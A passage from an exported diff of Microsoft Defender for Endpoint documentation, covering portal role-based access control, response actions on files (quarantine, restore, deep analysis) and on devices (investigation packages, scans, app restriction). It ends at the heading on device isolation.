-|[SecureShield365](https://patriotconsultingtech.com/)|Patriot Consulting|SecureShield365 includes a full deployment of all Microsoft Defender XDR products including Intune plus 12 months of support. Microsoft XDR including Sentinel, Defender for Cloud, and MDR are available options.|
-
-## Related articles
--- [Use the Microsoft Graph security API - Microsoft Graph | Microsoft Learn](/graph/api/resources/security-api-overview)--- [Configure managed service security provider integration](configure-mssp-support.md)
security Rbac https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/rbac.md
- Title: Use role-based access control to grant fine-grained access to Microsoft Defender portal
-description: Create roles and groups within your security operations to grant access to the portal.
------- m365-security-- tier2- Previously updated : 12/18/2020--
-# Manage portal access using role-based access control
-
-> [!NOTE]
-> If you are running the Microsoft Defender XDR preview program you can now experience the new Microsoft Defender 365 Unified role-based access control (RBAC) model. For more information, see [Microsoft Defender 365 Unified role-based access control (RBAC)](../defender/manage-rbac.md).
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- Microsoft Entra ID-- Office 365-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-rbac-abovefoldlink)
-
-Using role-based access control (RBAC), you can create roles and groups within your security operations team to grant appropriate access to the portal. Based on the roles and groups you create, you have fine-grained control over what users with access to the portal can see and do.
-
-> [!VIDEO https://www.microsoft.com/videoplayer/embed/RE4bJ2a]
-
-Large geo-distributed security operations teams typically adopt a tier-based model to assign and authorize access to security portals. Typical tiers include the following three levels:
-
-|Tier|Description|
-|||
-|Tier 1|**Local security operations team / IT team** <br/> This team usually triages and investigates alerts contained within their geolocation and escalates to Tier 2 in cases where an active remediation is required.|
-|Tier 2|**Regional security operations team** <br/>This team can see all the devices for their region and perform remediation actions.|
-|Tier 3|**Global security operations team** <br/>This team consists of security experts and are authorized to see and perform all actions from the portal.|
-
-> [!NOTE]
-> For Tier 0 assets, refer to [Privileged Identity Management](/azure/active-directory/privileged-identity-management/pim-configure) for security admins to provide more granular control of Microsoft Defender for Endpoint and Microsoft Defender XDR.
-
-Defender for Endpoint RBAC is designed to support your tier- or role-based model of choice and gives you granular control over what roles can see, devices they can access, and actions they can take. The RBAC framework is centered around the following controls:
--- **Control who can take specific action**
- - Create custom roles and control what Defender for Endpoint capabilities they can access with granularity.
-- **Control who can see information on specific device group or groups**
- - [Create device groups](machine-groups.md) by specific criteria such as names, tags, domains, and others, then grant role access to them using a specific Microsoft Entra user group.
-
- > [!NOTE]
- > Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.
-
-To implement role-based access, you'll need to define admin roles, assign corresponding permissions, and assign Microsoft Entra user groups assigned to the roles.
-
-## Before you begin
-
-Before using RBAC, it's important that you understand the roles that can grant permissions and the consequences of turning on RBAC.
-
-> [!WARNING]
-> Before enabling the feature, it's important that you have a Global Administrator role or Security Administrator role in Microsoft Entra ID and that you have your Microsoft Entra groups ready to reduce the risk of being locked out of the portal.
-
-When you first log in to the Microsoft Defender portal, you're granted either full access or read only access. Full access rights are granted to users with Security Administrator or Global Administrator roles in Microsoft Entra ID. Read only access is granted to users with a Security Reader role in Microsoft Entra ID.
-
-Someone with a Defender for Endpoint Global administrator role has unrestricted access to all devices, regardless of their device group association and the Microsoft Entra user groups assignments.
-
-> [!WARNING]
-> Initially, only those with Microsoft Entra Global Administrator or Security Administrator rights will be able to create and assign roles in the Microsoft Defender portal, therefore, having the right groups ready in Microsoft Entra ID is important.
->
-> **Turning on role-based access control will cause users with read-only permissions (for example, users assigned to Microsoft Entra Security reader role) to lose access until they are assigned to a role.**
->
-> Users with admin permissions are automatically assigned the default built-in Defender for Endpoint global administrator role with full permissions. After opting in to use RBAC, you can assign additional users that are not Microsoft Entra Global or Security Administrators to the Defender for Endpoint global administrator role.
->
-> After opting in to use RBAC, you cannot revert to the initial roles as when you first logged into the portal.
-
-## Related topic
--- [RBAC roles](../office-365-security/migrate-to-defender-for-office-365-onboard.md#rbac-roles)-- [Create and manage device groups in Microsoft Defender for Endpoint](machine-groups.md)-
security Respond File Alerts https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/respond-file-alerts.md
- Title: Take response actions on a file in Microsoft Defender for Endpoint
-description: Take response actions on file-related alerts by stopping and quarantining a file or blocking a file and checking activity details.
------- m365-security-- tier2-- mde-edr-- Previously updated : 08/07/2023--
-# Take response actions on a file
---
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)--
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-responddile-abovefoldlink)
-
-Quickly respond to detected attacks by stopping and quarantining files or blocking a file. After taking action on files, you can check on activity details in the Action center.
-
-Response actions are available on a file's detailed profile page. Once on this page, you can switch between the new and old page layouts by toggling **new File page**. The rest of this article describes the newer page layout.
-
-Response actions run along the top of the file page, and include:
--- Stop and quarantine file-- Manage indicator-- Download file -- Collect file-- Ask Defender Experts-- Manual actions-- Go hunt-- Deep analysis-
-> [!NOTE]
-> If you're using Defender for Endpoint Plan 1, you can take certain response actions manually. For more information, see [Manual response actions](/microsoft-365/security/defender-endpoint/defender-endpoint-plan-1#manual-response-actions).
-
-You can also submit files for deep analysis, to run the file in a secure cloud sandbox. When the analysis is complete, you'll get a detailed report that provides information about the behavior of the file. You can submit files for deep analysis and read past reports by selecting the **Deep analysis** action.
-
-Some actions require certain permissions. The following table describes what action certain permissions can take on portable executable (PE) and non-PE files:
-
-|Permission|PE files|Non-PE files|
-||::|::|
-|View data|X|X|
-|Alerts investigation|&#x2611;|X|
-|Live response basic|X|X|
-|Live response advanced|&#x2611;|&#x2611;|
-
-For more information on roles, see [Create and manage roles for role-based access control](user-roles.md).
-
-## Stop and quarantine files in your network
-
-You can contain an attack in your organization by stopping the malicious process and quarantining the file where it was observed.
-
-> [!IMPORTANT]
-> You can only take this action if:
->
-> - The device you're taking the action on is running Windows 10, version 1703 or later, Windows 11, and Windows Server 2012 R2+
-> - The file does not belong to trusted third-party publishers or is not signed by Microsoft
-> - Microsoft Defender Antivirus must at least be running on Passive mode. For more information, see [Microsoft Defender Antivirus compatibility](/windows/security/threat-protection/microsoft-defender-antivirus/microsoft-defender-antivirus-compatibility).
-
-The **Stop and Quarantine File** action includes stopping running processes, quarantining the files, and deleting persistent data such as registry keys.
-
-This action takes effect on devices with Windows 10, version 1703 or later, and Windows 11 and Server 2012 R2+, where the file was observed in the last 30 days.
-
-> [!NOTE]
-> You'll be able to restore the file from quarantine at any time.
-
-### Stop and quarantine files
-
-1. Select the file you want to stop and quarantine. You can select a file from any of the following views or use the Search box:
-
- - **Alerts** - select the corresponding links from the Description or Details in the Alert Story timeline
- - **Search box** - select **File** from the drop-down menu and enter the file name
-
- > [!NOTE]
- > The stop and quarantine file action is limited to a maximum of 1000 devices. To stop a file on a larger number of devices, see [Add indicator to block or allow file](#add-indicator-to-block-or-allow-a-file).
-
-2. Go to the top bar and select **Stop and Quarantine File**.
-
- :::image type="content" source="media/atp-stop-quarantine-file.png" alt-text="The stop and quarantine file action" lightbox="media/atp-stop-quarantine-file.png":::
-
-3. Specify a reason, then select **Confirm**.
-
- :::image type="content" source="media/atp-stop-quarantine.png" alt-text="The stop and quarantine file page" lightbox="media/atp-stop-quarantine.png":::
-
- The Action center shows the submission information:
-
- :::image type="content" source="media/atp-stopnquarantine-file.png" alt-text="The stop and quarantine file action center" lightbox="media/atp-stopnquarantine-file.png":::
-
- - **Submission time** - Shows when the action was submitted.
- - **Success** - Shows the number of devices where the file has been stopped and quarantined.
- - **Failed** - Shows the number of devices where the action failed and details about the failure.
- - **Pending** - Shows the number of devices where the file is yet to be stopped and quarantined from. This can take time for cases when the device is offline or not connected to the network.
-
-4. Select any of the status indicators to view more information about the action. For example, select **Failed** to see where the action failed.
-
-#### Notification on device user
-
-When the file is being removed from a device, the following notification is shown:
--
-In the device timeline, a new event is added for each device where a file was stopped and quarantined.
-
-A warning is shown before the action is implemented for files widely used throughout an organization. It's to validate that the operation is intended.
-
-## Restore file from quarantine
-
-You can roll back and remove a file from quarantine if you've determined that it's clean after an investigation. Run the following command on each device where the file was quarantined.
-
-1. Open an elevated command-line prompt on the device:
-
- 1. Go to **Start** and type _cmd_.
-
- 1. Right-click **Command prompt** and select **Run as administrator**.
-
-2. Enter the following command, and press **Enter**:
-
- ```dos
- "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -Restore -Name EUS:Win32/CustomEnterpriseBlock -All
- ```
-
- > [!NOTE]
- > In some scenarios, the **ThreatName** may appear as: EUS:Win32/CustomEnterpriseBlock!cl.
- >
- > Defender for Endpoint will restore all custom blocked files that were quarantined on this device in the last 30 days.
-
-> [!IMPORTANT]
-> A file that was quarantined as a potential network threat might not be recoverable. If a user attempts to restore the file after quarantine, that file might not be accessible. This can be due to the system no longer having network credentials to access the file. Typically, this is a result of a temporary log on to a system or shared folder and the access tokens expired.
-
-## Download or collect file
-
-Selecting **Download file** from the response actions allows you to download a local, password-protected .zip archive containing your file. A flyout will appear where you can record a reason for downloading the file, and set a password.
-
-By default, you should be able to download files that are in quarantine.
-
-The **Download file** button can have the following states:
--- **Active** - You'll be able to collect the file. --- **Disabled** - If the button is grayed out or disabled during an active collection attempt, you may not have appropriate RBAC permissions to collect files.-
- The following permissions are required:
-
- For Microsoft Defender XDR Unified role-based access control (RBAC):
-
- - Add file collection permission in Microsoft Defender XDR Unified (RBAC)
-
- For Microsoft Defender for Endpoint role-based access control (RBAC):
-
- For Portable Executable file (.exe, .sys, .dll, and others)
- - Global admin or Advanced live response or Alerts
-
- Non-Portable Executable file (.txt, .docx, and others)
- - Global admin or Advanced live response
- - Tenants with [role-based access (RBAC) permissions](../defender/manage-rbac.md) enabled
---
-### Download quarantined files
-
-Files that have been quarantined by Microsoft Defender Antivirus or your security team will be saved in a compliant way according to your [sample submission configurations](enable-cloud-protection-microsoft-defender-antivirus.md). Your security team can download the files directly from the file's detail page via the "Download file" button. **This feature is turned 'On' by default**.
-
-The location depends on your organization's geo settings (either EU, UK, or US). A quarantined file will only be collected once per organization. Learn more about Microsoft's data protection from the Service Trust Portal at https://aka.ms/STP.
-
-Having this setting turned on can help security teams examine potentially bad files and investigate incidents quickly and in a less risky way. However, if you need to turn off this setting, go to **Settings** \> **Endpoints** \> **Advanced features** \> **Download quarantined files** to adjust the setting. [Learn more about advanced features](advanced-features.md)
-
-#### Backing up quarantined files
-
-Users may be prompted to provide explicit consent before backing up the quarantined file, depending on your [sample submission configuration](enable-cloud-protection-microsoft-defender-antivirus.md#use-group-policy-to-turn-on-cloud-protection).
-
-This feature won't work if sample submission is turned off. If automatic sample submission is set to request permission from the user, only samples that the user agrees to send will be collected.
-
-> [!IMPORTANT]
-> Download quarantined file requirements:
->
-> - Your organization uses Microsoft Defender Antivirus in active mode
-> - Antivirus engine version is 1.1.17300.4 or later. See [Monthly platform and engine versions](microsoft-defender-antivirus-updates.md#monthly-platform-and-engine-versions)
-> - CloudΓÇôbased protection is enabled. See [Turn on cloud-delivered protection](enable-cloud-protection-microsoft-defender-antivirus.md)
-> - Sample submission is turned on
-> - Devices have Windows 10 version 1703 or later, or Windows server 2016 or 2019, or Windows Server 2022, or Windows 11
-
-### Collect files
-
-If a file isn't already stored by Microsoft Defender for Endpoint, you can't download it. Instead, you'll see a **Collect file** button in the same location.
-
-The **Collect file** button can have the following states:
--- **Active** - You'll be able to collect the file. --- **Disabled** - If the button is grayed out or disabled during an active collection attempt, you may not have appropriate RBAC permissions to collect files. --
- The following permissions are required:
-
- For Portable Executable file (.exe, .sys, .dll, and others)
- - Global admin or Advanced live response or Alerts
-
- Non-Portable Executable file (.txt, .docx, and others)
- - Global admin or Advanced live response
--
-If a file hasn't been seen in the organization in the past 30 days, **Collect file** will be disabled.
--
-> [!Important]
-> A file that was quarantined as a potential network threat might not be recoverable. If a user attempts to restore the file after quarantine, that file might not be accessible. This can be due to the system no longer having network credentials to access the file. Typically, this is a result of a temporary log on to a system or shared folder and the access tokens expired.
-
-## Add indicator to block or allow a file
-
-Prevent further propagation of an attack in your organization by banning potentially malicious files or suspected malware. If you know a potentially malicious portable executable (PE) file, you can block it. This operation will prevent it from being read, written, or executed on devices in your organization.
-
-> [!IMPORTANT]
->
-> - This feature is available if your organization uses Microsoft Defender Antivirus and Cloud-delivered protection is enabled. For more information, see [Manage cloud-delivered protection](/windows/security/threat-protection/microsoft-defender-antivirus/deploy-manage-report-microsoft-defender-antivirus).
->
-> - The Antimalware client version must be 4.18.1901.x or later.
-> - This feature is designed to prevent suspected malware (or potentially malicious files) from being downloaded from the web. It currently supports portable executable (PE) files, including _.exe_ and _.dll_ files. The coverage will be extended over time.
-> - This response action is available for devices on Windows 10, version 1703 or later, and Windows 11.
-> - The allow or block function cannot be done on files if the file's classification exists on the device's cache prior to the allow or block action.
-
-> [!NOTE]
-> The PE file needs to be in the device timeline for you to be able to take this action.
->
-> There may be a couple of minutes of latency between the time the action is taken and the actual file being blocked.
-
-### Enable the block file feature
-
-To start blocking files, you first need to [turn the **Block or allow** feature on](advanced-features.md) in Settings.
-
-### Allow or block file
-
-When you add an indicator hash for a file, you can choose to raise an alert and block the file whenever a device in your organization attempts to run it.
-
-Files automatically blocked by an indicator won't show up in the file's Action center, but the alerts will still be visible in the Alerts queue.
-
-See [manage indicators](manage-indicators.md) for more details on blocking and raising alerts on files.
-
-To stop blocking a file, remove the indicator. You can do so via the **Edit Indicator** action on the file's profile page. This action will be visible in the same position as the **Add Indicator** action, before you added the indicator.
-
-You can also edit indicators from the **Settings** page, under **Rules** \> **Indicators**. Indicators are listed in this area by their file's hash.
-
-## Check activity details in Action center
-
-The **Action center** provides information on actions that were taken on a device or file. You can view the following details:
--- Investigation package collection-- Antivirus scan-- App restriction-- Device isolation-
-All other related details are also shown, such as submission date/time, submitting user, and if the action succeeded or failed.
--
-## Deep analysis
-
-Cyber security investigations are typically triggered by an alert. Alerts are related to one or more observed files that are often new or unknown. Selecting a file takes you to the file view where you can see the file's metadata. To enrich the data related to the file, you can submit the file for deep analysis.
-
-The Deep analysis feature executes a file in a secure, fully instrumented cloud environment. Deep analysis results show the file's activities, observed behaviors, and associated artifacts, such as dropped files, registry modifications, and communication with IPs.
-Deep analysis currently supports extensive analysis of portable executable (PE) files (including _.exe_ and _.dll_ files).
-
-Deep analysis of a file takes several minutes. Once the file analysis is complete, the Deep Analysis tab will update to display a summary and the date and time of the latest available results.
-
-The deep analysis summary includes a list of observed *behaviors*, some of which can indicate malicious activity, and *observables*, including contacted IPs and files created on the disk. If nothing was found, these sections will display a brief message.
-
-Results of deep analysis are matched against threat intelligence and any matches will generate appropriate alerts.
-
-Use the deep analysis feature to investigate the details of any file, usually during an investigation of an alert or for any other reason where you suspect malicious behavior. This feature is available at the top of the file's page. Select the three dots to access the **Deep analysis** action.
--
-Learn about deep analysis in the following video:
-> [!VIDEO https://www.microsoft.com/videoplayer/embed/RE4aAYy?rel=0]
-
-**Submit for deep analysis** is enabled when the file is available in the Defender for Endpoint backend sample collection, or if it was observed on a Windows 10 device that supports submitting to deep analysis.
-
-> [!NOTE]
-> Only files from Windows 10, Windows 11, and Windows Server 2012 R2+ can be automatically collected.
-
-You can also submit a sample through the [Microsoft Defender portal](https://www.microsoft.com/security/portal/submission/submit.aspx) if the file wasn't observed on a Windows 10 device (or Windows 11 or Windows Server 2012 R2+), and wait for **Submit for deep analysis** button to become available.
-
-> [!NOTE]
-> Due to backend processing flows in the Microsoft Defender portal, there could be up to 10 minutes of latency between file submission and availability of the deep analysis feature in Defender for Endpoint.
-
-### Submit files for deep analysis
-
-1. Select the file that you want to submit for deep analysis. You can select or search a file from any of the following views:
-
- - **Alerts** - select the file links from the **Description** or **Details** in the Alert Story timeline
- - **Devices list** - select the file links from the **Description** or **Details** in the **Device in organization** section
- - **Search box** - select **File** from the drop-down menu and enter the file name
-
-2. In the **Deep analysis** tab of the file view, select **Submit**.
-
- :::image type="content" source="media/submit-file.png" alt-text="The submit PE files button" lightbox="media/submit-file.png":::
-
- > [!NOTE]
- > Only PE files are supported, including _.exe_ and _.dll_ files.
-
- A progress bar is displayed and provides information on the different stages of the analysis. You can then view the report when the analysis is done.
-
-> [!NOTE]
-> Depending on device availability, sample collection time can vary. There is a 3-hour timeout for sample collection. The collection will fail and the operation will abort if there is no online Windows 10 device (or Windows 11 or Windows Server 2012 R2+) reporting at that time. You can re-submit files for deep analysis to get fresh data on the file.
-
-### View deep analysis reports
-
-View the provided deep analysis report to see more in-depth insights on the file you submitted. This feature is available in the file view context.
-
-You can view the comprehensive report that provides details on the following sections:
--- Behaviors-- Observables-
-The details provided can help you investigate if there are indications of a potential attack.
-
-1. Select the file you submitted for deep analysis.
-2. Select the **Deep analysis** tab. If there are any previous reports, the report summary will appear in this tab.
-
- :::image type="content" source="media/analysis-results-nothing500.png" alt-text="The deep analysis report showing detailed information across a number of categories" lightbox="media/analysis-results-nothing500.png":::
-
-#### Troubleshoot deep analysis
-
-If you come across a problem when trying to submit a file, try each of the following troubleshooting steps.
-
-1. Ensure that the file in question is a PE file. PE files typically have _.exe_ or _.dll_ extensions (executable programs or applications).
-
-2. Ensure the service has access to the file, that it still exists, and hasn't been corrupted or modified.
-
-3. Wait a short while and try to submit the file again. The queue may be full, or there was a temporary connection or communication error.
-
-4. If the sample collection policy isn't configured, then the default behavior is to allow sample collection. If it's configured, then verify the policy setting allows sample collection before submitting the file again. When sample collection is configured, then check the following registry value:
-
- ```text
- Path: HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection
- Name: AllowSampleCollection
- Type: DWORD
- Hexadecimal value :
- Value = 0 - block sample collection
- Value = 1 - allow sample collection
- ```
-
-5. Change the organizational unit through the Group Policy. For more information, see [Configure with Group Policy](configure-endpoints-gp.md).
-
-6. If these steps don't resolve the issue, contact support.
-
-## Related topics
--- [Take response actions on a device](respond-machine-alerts.md)-- [Investigate files](investigate-files.md)-- [Manual response actions in Microsoft Defender for Endpoint Plan 1](defender-endpoint-plan-1.md#manual-response-actions)
security Respond Machine Alerts https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/respond-machine-alerts.md
- Title: Take response actions on a device in Microsoft Defender for Endpoint
-description: Take response actions on a device such as isolating devices, collecting an investigation package, managing tags, running an av scan, and restricting app execution.
--- Previously updated : 12/15/2023---- m365-security-- tier2-- mde-edr----
-# Take response actions on a device
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plans 1 and 2](microsoft-defender-endpoint.md)-- [Microsoft Defender for Business](/microsoft-365/security/defender-business/mdb-overview)--
-Quickly respond to detected attacks by isolating devices or collecting an investigation package. After taking action on devices, you can check activity details on the Action center.
-
-Response actions run along the top of a specific device page and include:
--- Manage tags-- Initiate Automated Investigation-- Initiate Live Response Session-- Collect investigation package-- Run antivirus scan-- Restrict app execution-- Isolate device-- Contain device-- Consult a threat expert-- Action center-
-[![Image of response actions.](media/response-actions.png)](media/response-actions.png#lightbox)
-
-> [!IMPORTANT]
-> [Defender for Endpoint Plan 1](defender-endpoint-plan-1.md) includes only the following manual response actions:
->
-> - Run antivirus scan
-> - Isolate device
-> - Stop and quarantine a file
-> - Add an indicator to block or allow a file.
->
-> [Microsoft Defender for Business](../defender-business/mdb-overview.md) does not include the "Stop and quarantine a file" action at this time.
->
-> Your subscription must include Defender for Endpoint Plan 2 to have all of the response actions described in this article.
-
- You can find device pages from any of the following views:
--- **Alerts queue** - Select the device name beside the device icon from the alerts queue.-- **Devices list** - Select the heading of the device name from the devices list.-- **Search box** - Select Device from the drop-down menu and enter the device name.-
-> [!IMPORTANT]
-> For information on availability and support for each response action, please refer to the supported/minimum operating system requirements found under each feature.
-
-## Manage tags
-
-Add or manage tags to create a logical group affiliation. Device tags support proper mapping of the network, enabling you to attach different tags to capture context and to enable dynamic list creation as part of an incident.
-
-For more information on device tagging, see [Create and manage device tags](machine-tags.md).
-
-## Initiate Automated Investigation
-
-You can start a new general purpose automated investigation on the device if needed. While an investigation is running, any other alert generated from the device will be added to an ongoing Automated investigation until that investigation is completed. In addition, if the same threat is seen on other devices, those devices are added to the investigation.
-
-For more information on automated investigations, see [Overview of Automated investigations](automated-investigations.md).
-
-## Initiate live response session
-
-Live response is a capability that gives you instantaneous access to a device by using a remote shell connection. This gives you the power to do in-depth investigative work and take immediate response actions to promptly contain identified threats in real time.
-
-Live response is designed to enhance investigations by enabling you to collect forensic data, run scripts, send suspicious entities for analysis, remediate threats, and proactively hunt for emerging threats.
-
-For more information on live response, see [Investigate entities on devices using live response](live-response.md).
-
-## Collect investigation package from devices
-
-As part of the investigation or response process, you can collect an investigation package from a device. By collecting the investigation package, you can identify the current state of the device and further understand the tools and techniques used by the attacker.
-
-To download the package (Zip file) and investigate the events that occurred on a device:
-
-1. Select **Collect investigation package** from the row of response actions at the top of the device page.
-
-2. Specify in the text box why you want to perform this action. Select **Confirm**.
-
-3. The zip file downloads.
-
-Alternate steps:
-
-1. Select **Collect Investigation Package** from the response actions section of the device page.
-
- ![Image of collect investigation package](media/collect-investigation-package.png)
-
-1. Add comments and select **Confirm**.
-
- ![Image of confirm comment](media/comments-confirm.png)
-
-1. Select **Action center** from the response actions section of the device page.
-
- ![Image of action center](media/action-center-selected.png)
-
-1. Click the **Package collection package available** to download the collection package.
-
- ![Image of download package](media/download-package.png)
-
- For Windows devices, the package contains the following folders:
-
- |Folder|Description|
-|||
-|Autoruns|Contains a set of files that each represent the content of the registry of a known auto start entry point (ASEP) to help identify attacker's persistency on the device. <p> <div class="alert"><b>NOTE:</b> If the registry key is not found, the file will contain the following message: "ERROR: The system was unable to find the specified registry key or value."<div>|
-|Installed programs|This .CSV file contains the list of installed programs that can help identify what is currently installed on the device. For more information, see [Win32_Product class](https://go.microsoft.com/fwlink/?linkid=841509).|
-|Network connections|This folder contains a set of data points related to the connectivity information that can help in identifying connectivity to suspicious URLs, attacker's command and control (C&C) infrastructure, any lateral movement, or remote connections. <ul><li>ActiveNetConnections.txt: Displays protocol statistics and current TCP/IP network connections. Provides the ability to look for suspicious connectivity made by a process.</li><li>Arp.txt: Displays the current address resolution protocol (ARP) cache tables for all interfaces. ARP cache can reveal other hosts on a network that have been compromised or suspicious systems on the network that might have been used to run an internal attack.</il><li>DnsCache.txt: Displays the contents of the DNS client resolver cache, which includes both entries preloaded from the local Hosts file and any recently obtained resource records for name queries resolved by the computer. This can help in identifying suspicious connections.</li><li>IpConfig.txt: Displays the full TCP/IP configuration for all adapters. Adapters can represent physical interfaces, such as installed network adapters, or logical interfaces, such as dial-up connections.</li><li>FirewallExecutionLog.txt and pfirewall.log</li></ul><p><div class="alert"><b>NOTE:</b> The pfirewall.log file must exist in %windir%\system32\logfiles\firewall\pfirewall.log, so it will be included in the investigation package. For more information on creating the firewall log file, see [Configure the Windows Defender Firewall with Advanced Security Log](/windows/security/threat-protection/windows-firewall/configure-the-windows-firewall-log)<div>|
-|Prefetch files|Windows Prefetch files are designed to speed up the application startup process. It can be used to track all the files recently used in the system and find traces for applications that might have been deleted but can still be found in the prefetch file list. <ul><li>Prefetch folder: Contains a copy of the prefetch files from `%SystemRoot%\Prefetch`. NOTE: It is suggested to download a prefetch file viewer to view the prefetch files.</li><li>PrefetchFilesList.txt: Contains the list of all the copied files that can be used to track if there were any copy failures to the prefetch folder.</li></ul>|
-|Processes|Contains a .CSV file listing the running processes and provides the ability to identify current processes running on the device. This can be useful when identifying a suspicious process and its state.|
-|Scheduled tasks|Contains a .CSV file listing the scheduled tasks, which can be used to identify routines performed automatically on a chosen device to look for suspicious code that was set to run automatically.|
-|Security event log|Contains the security event log, which contains records of login or logout activity, or other security-related events specified by the system's audit policy. <p><div class="alert"><b>NOTE:</b> Open the event log file using Event viewer.</div>|
-|Services|Contains a .CSV file that lists services and their states.|
-|Windows Server Message Block (SMB) sessions|Lists shared access to files, printers, and serial ports and miscellaneous communications between nodes on a network. This can help identify data exfiltration or lateral movement. <p> Contains files for SMBInboundSessions and SMBOutboundSession. <p> <div class="alert"><b>NOTE:</b> If there are no sessions (inbound or outbound), you'll get a text file that tells you that there are no SMB sessions found.</div>|
-|System Information|Contains a SystemInformation.txt file that lists system information such as OS version and network cards.|
-|Temp Directories|Contains a set of text files that lists the files located in %Temp% for every user in the system. <p> This can help to track suspicious files that an attacker may have dropped on the system. <p> <div class="alert"><b>NOTE:</b> If the file contains the following message: "The system cannot find the path specified", it means that there is no temp directory for this user, and might be because the user didn't log in to the system.</div>|
-|Users and Groups|Provides a list of files that each represent a group and its members.|
-|WdSupportLogs|Provides the MpCmdRunLog.txt and MPSupportFiles.cab <p> <div class="alert"><b>NOTE:</b> This folder will only be created on Windows 10, version 1709 or later with February 2020 update rollup or more recent installed: <ul><li>Win10 1709 (RS3) Build 16299.1717: [KB4537816](https://support.microsoft.com/help/4537816/windows-10-update-kb4537816)</li><li>Win10 1803 (RS4) Build 17134.1345: [KB4537795](https://support.microsoft.com/help/4537795/windows-10-update-kb4537795)</li><li>Win10 1809 (RS5) Build 17763.1075: [KB4537818](https://support.microsoft.com/help/4537818/windows-10-update-kb4537818)</li><li>Win10 1903/1909 (19h1/19h2) Builds 18362.693 and 18363.693: [KB4535996](https://support.microsoft.com/help/4535996/windows-10-update-kb4535996)</li></ul> </div>|
-|CollectionSummaryReport.xls|This file is a summary of the investigation package collection, it contains the list of data points, the command used to extract the data, the execution status, and the error code if there is failure. You can use this report to track if the package includes all the expected data and identify if there were any errors.|
-
- The collection packages for macOS and Linux devices contain the following:
-
- |Object|macOS|Linux|
-||||
-|Applications|A list of all installed applications|Not applicable|
-|Disk volume|<ul><li>Amount of free space</li><li>List of all mounted disk volumes</li><li>List of all partitions</li>|<ul><li>Amount of free space</li><li>List of all mounted disk volumes</li><li>List of all partitions</li>|
-|File|A list of all open files with the corresponding processes using these files|A list of all open files with the corresponding processes using these files|
-|History|Shell history|Not applicable|
-|Kernel modules|All loaded modules|Not applicable|
-|Network connections|<ul><li>Active connections</li><li>Active listening connections</li><li>ARP table</li><li>Firewall rules</li><li>Interface configuration</li><li>Proxy settings</li><li>VPN settings</li></ul>|<ul><li>Active connections</li><li>Active listening connections</li><li>ARP table</li><li>Firewall rules</li><li>IP list</li><li>Proxy settings</li></ul>|
-|Processes|A list of all running processes|A list of all running processes|
-|Services and scheduled tasks|<ul><li>Certificates</li><li>Configuration profiles</li><li>Hardware information|<ul><li>CPU details</li><li>Hardware information</li><li>Operating system information</li>|
-|System security information|<ul><li>Extensible Firmware Interface (EFI) integrity information</li><li>Firewall status</li><li>Malware Removal Tool (MRT) information</li><li>System Integrity Protection (SIP) status</li>|Not applicable|
-|Users and groups|<ul><li>Login history</li><li>Sudoers</li></ul>|<ul><li>Login history</li><li>Sudoers</li></ul>|
-
-## Run Microsoft Defender Antivirus scan on devices
-
-As part of the investigation or response process, you can remotely initiate an antivirus scan to help identify and remediate malware that might be present on a compromised device.
-
-> [!IMPORTANT]
->
-> - This action is supported for macOS and Linux for client version 101.98.84 and above. You can also use live response to run the action. For more information on live response, see [Investigate entities on devices using live response](live-response.md)
-> - A Microsoft Defender Antivirus scan can run alongside other antivirus solutions, whether Microsoft Defender Antivirus is the active antivirus solution or not. Microsoft Defender Antivirus can be in Passive mode. For more information, see [Microsoft Defender Antivirus compatibility](/microsoft-365/security/defender-endpoint/microsoft-defender-antivirus-compatibility).
-
-One you have selected **Run antivirus scan**, select the scan type that you'd like to run (quick or full) and add a comment before confirming the scan.
--
-The Action center will show the scan information and the device timeline will include a new event, reflecting that a scan action was submitted on the device. Microsoft Defender Antivirus alerts will reflect any detections that surfaced during the scan.
-
-> [!NOTE]
-> When triggering a scan using Defender for Endpoint response action, Microsoft Defender antivirus 'ScanAvgCPULoadFactor' value still applies and limits the CPU impact of the scan.
-> If ScanAvgCPULoadFactor is not configured, the default value is a limit of 50% maximum CPU load during a scan.
-> For more information, see [configure-advanced-scan-types-microsoft-defender-antivirus](/windows/security/threat-protection/microsoft-defender-antivirus/configure-advanced-scan-types-microsoft-defender-antivirus).
-
-## Restrict app execution
-
-In addition to containing an attack by stopping malicious processes, you can also lock down a device and prevent subsequent attempts of potentially malicious programs from running.
-
-> [!IMPORTANT]
->
-> - This action is available for devices on Windows 10, version 1709 or later, Windows 11, and Windows Server 2019 or later.
-> - This feature is available if your organization uses Microsoft Defender Antivirus.
-> - This action needs to meet the Windows Defender Application Control code integrity policy formats and signing requirements. For more information, see [Code integrity policy formats and signing](/windows/security/threat-protection/windows-defender-application-control/use-code-signing-to-simplify-application-control-for-classic-windows-applications)).
-
-To restrict an application from running, a code integrity policy is applied that only allows files to run if they are signed by a Microsoft issued certificate. This method of restriction can help prevent an attacker from controlling compromised devices and performing further malicious activities.
-
-> [!NOTE]
-> You'll be able to reverse the restriction of applications from running at any time. The button on the device page will change to say **Remove app restrictions**, and then you take the same steps as restricting app execution.
-
-Once you have selected **Restrict app execution** on the device page, type a comment and select **Confirm**. The Action center will show the scan information and the device timeline will include a new event.
--
-### Notification on device user
-
-When an app is restricted, the following notification is displayed to inform the user that an app is being restricted from running:
--
-> [!NOTE]
-> The notification is not available on Windows Server 2016 and Windows Server 2012 R2.
-
-## Isolate devices from the network
-
